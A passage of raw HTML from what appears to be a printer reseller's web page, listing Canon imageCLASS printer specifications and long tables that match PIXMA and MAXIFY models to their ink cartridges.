sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p>\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>First Print Out Time (A4): Approx. 6.5 sec</li>\n 	<li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n 	<li>Mobile Printing</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 43ppm</li>\n 	<li>Recommended monthly print volume: 2,000 - 7,500 pages</li>\n 	<li>FPOT: 6.2secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 2,300 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p>\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 38ppm</li>\n 	<li>Recommended monthly print volume: 750 - 4,000 pages</li>\n 	<li>FPOT: 5.5secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 900 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h2>Cartridge Printers :-</h2>		\n		&nbsp;\n<table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr>\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"13\" align=\"center\">imagePROGRAF PRO-500</td>\n<td>Maintenance Cartridge MC-20</td>\n</tr>\n<tr>\n<td>PFI-50 (Blue)</td>\n</tr>\n<tr>\n<td>PFI-50 (Chroma Optimizer)</td>\n</tr>\n<tr>\n<td>PFI-50 (Cyan)</td>\n</tr>\n<tr>\n<td>PFI-50 (Gray)</td>\n</tr>\n<tr>\n<td>PFI-50 (Magenta)</td>\n</tr>\n<tr>\n<td>PFI-50 (Matte Black)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Black)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Cyan)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Gray)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Magenta)</td>\n</tr>\n<tr>\n<td>PFI-50 (Red)</td>\n</tr>\n<tr>\n<td>PFI-50 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY iB4170</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5070</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5170</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5370</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5470</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E3170</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E410</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin 